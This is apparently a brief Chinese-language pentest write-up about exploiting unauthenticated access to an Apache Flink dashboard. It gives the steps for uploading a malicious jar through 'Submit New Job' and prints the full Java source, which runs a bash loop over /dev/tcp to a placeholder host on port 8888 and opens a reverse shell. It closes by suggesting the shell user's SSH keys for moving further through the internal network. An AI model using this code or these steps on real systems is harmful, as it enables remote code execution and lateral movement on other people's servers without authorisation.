Apache Flink未授权访问+反弹shell

某个项目在内网中遇到了Flink未授权访问，做个记录。

访问后点开Submit New Job
右上角Add new上传恶意jar包。

首先用idea新建个项目，内容就反弹shell命令。

public class Revs {
    public static void main(String[] args) throws Exception {
        // TODO Auto-generated method stub
        Runtime r = Runtime.getRuntime();
        String cmd[]= {"/bin/bash","-c","exec 5<>/dev/tcp/xxxx/8888;cat <&5 | while read line; do $line 2>&5 >&5; done"};
        Process p = r.exec(cmd);
        p.waitFor();
    }
}

这样一个jar包就制作成功了。
上传后点击jar包名的任务，然后提交。shell已经返回了。

可以注意下，flink是有很多节点的，所以反弹的shell权限用户会有sshkey。可以进一步扩展内网。